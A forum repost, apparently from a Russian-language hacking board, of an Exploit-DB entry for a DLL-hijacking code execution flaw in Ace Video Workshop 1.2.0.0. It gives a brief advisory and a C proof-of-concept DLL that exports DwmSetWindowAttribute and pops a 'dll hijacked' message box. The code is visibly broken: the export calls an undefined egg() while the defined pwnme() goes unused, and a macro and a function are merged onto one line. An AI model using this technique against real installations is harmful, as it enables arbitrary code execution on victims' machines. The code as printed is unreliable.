Exploit Ace Video Workshop 1.2.0.0 - 'ir50_lcs.dll' DLL Loading Arbitrary Code Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
35166
Проверка EDB
  1. Пройдено
Автор
D3C0DER
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
N/A
Дата публикации
2011-01-03
C:
// source: https://www.securityfocus.com/bid/45675/info

Ace Video Workshop is prone to an arbitrary-code-execution vulnerability.

An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.

Ace Video Workshop 1.2.0.0 is vulnerable; other versions may also be affected.

#include <windows.h> 
#define DllExport __declspec (dllexport) DllExport void DwmSetWindowAttribute() { egg();}

int pwnme() 
{
MessageBox(0, "dll hijacked !! ", "Dll Message", MB_OK); 
exit(0); 
return 0; 
}
 
Источник
www.exploit-db.com

Похожие темы